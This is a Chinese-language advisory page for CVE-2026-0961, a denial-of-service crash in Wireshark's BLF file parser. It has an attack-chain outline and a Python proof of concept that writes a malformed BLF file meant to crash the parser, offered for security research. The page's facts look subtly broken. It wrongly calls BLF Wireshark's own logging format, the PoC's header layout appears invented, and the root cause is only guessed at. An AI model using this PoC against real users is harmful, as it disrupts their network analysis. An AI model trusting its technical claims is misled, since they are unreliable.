CVE-2026-0961: Wireshark BLF文件解析器崩溃导致拒绝服务

漏洞信息

漏洞编号

CVE-2026-0961

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Wireshark

漏洞概述

CVE-2026-0961是Wireshark网络协议分析器中的一个拒绝服务漏洞。该漏洞存在于BLF（Binary Logging Framework）文件解析器中，攻击者可以通过构造恶意的BLF文件来触发解析器崩溃。当目标用户使用Wireshark打开特制的BLF文件时，会导致Wireshark进程崩溃或无响应，从而造成拒绝服务。该漏洞影响Wireshark 4.6.0至4.6.2版本以及4.4.0至4.4.12版本。攻击需要用户交互，攻击者需要诱导用户打开恶意BLF文件。虽然该漏洞不直接导致代码执行或数据泄露，但会严重影响Wireshark的可用性，导致网络分析工作中断。CVSS 3.1评分5.5，属于中等严重程度，主要影响系统的可用性。

技术细节

该漏洞位于Wireshark的BLF文件格式解析模块。BLF是Wireshark用于二进制日志记录的格式，解析器在处理BLF文件时存在边界检查不足或状态处理错误。当解析器遇到畸形或恶意构造的BLF文件时，可能触发空指针解引用、缓冲区溢出或未处理异常，导致进程崩溃。攻击者可通过以下方式利用：1）创建包含恶意数据的BLF文件；2）修改BLF文件头或数据结构中的特定字段；3）嵌入异常长度或格式错误的数据块。Wireshark在打开文件时会自动调用解析器，无需用户额外操作，但需要用户显式打开文件才能触发漏洞。攻击复杂度低，但需要用户交互配合。

攻击链分析

STEP 1

步骤1

攻击者创建包含恶意构造数据的BLF文件，通过修改文件头、chunk结构或嵌入异常数据来触发解析器漏洞

STEP 2

步骤2

攻击者将恶意BLF文件通过邮件、共享文件夹或其他方式传播给目标用户

STEP 3

步骤3

目标用户使用存在漏洞的Wireshark版本打开恶意BLF文件

STEP 4

步骤4

Wireshark的BLF解析器在处理畸形数据时发生崩溃或进入异常状态

STEP 5

步骤5

Wireshark进程崩溃或无响应，导致拒绝服务，用户无法进行网络协议分析

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2026-0961 PoC - Malicious BLF File Generator
# This PoC generates a malformed BLF file to trigger Wireshark parser crash

import struct
import sys

def create_malformed_blf(filename):
    """
    Generate a malformed BLF file to trigger parser crash in Wireshark
    """
    # BLF file header structure
    magic = b'BLF\x00'  # BLF magic bytes
    version = struct.pack('<I', 0x00000001)  # Version 1
    
    # Create malformed header with invalid data
    header = magic + version
    header += struct.pack('<Q', 0xFFFFFFFFFFFFFFFF)  # Invalid size field
    header += struct.pack('<I', 0x00000000)  # Zero flags
    
    # Malformed chunk data
    chunk_type = struct.pack('<I', 0x41414141)  # Invalid chunk type (AAAA)
    chunk_size = struct.pack('<Q', 0x7FFFFFFF)  # Oversized chunk
    
    # Crafted payload with malformed structures
    payload = b'\x00' * 100  # Null bytes
    payload += b'\xFF' * 100  # Invalid data
    payload += struct.pack('<I', 0xDEADBEEF)  # Magic markers
    
    # Write malicious BLF file
    with open(filename, 'wb') as f:
        f.write(header)
        f.write(chunk_type)
        f.write(chunk_size)
        f.write(payload)
    
    print(f'[+] Created malicious BLF file: {filename}')
    print(f'[+] File size: {len(header) + len(chunk_type) + len(chunk_size) + len(payload)} bytes')

if __name__ == '__main__':
    if len(sys.argv) != 2:
        print('Usage: python3 cve_2026_0961_poc.py <output.blf>')
        sys.exit(1)
    
    create_malformed_blf(sys.argv[1])

影响范围

Wireshark 4.6.0 - 4.6.2

Wireshark 4.4.0 - 4.4.12

防御指南

临时缓解措施

在官方修复发布前，应避免打开来源不明的BLF文件，只打开可信来源的网络抓包文件。同时可以使用命令行工具（如tshark）的严格模式或禁用BLF解析器插件来降低风险。建议对所有网络分析相关文件进行安全扫描，并在沙箱环境中打开可疑文件。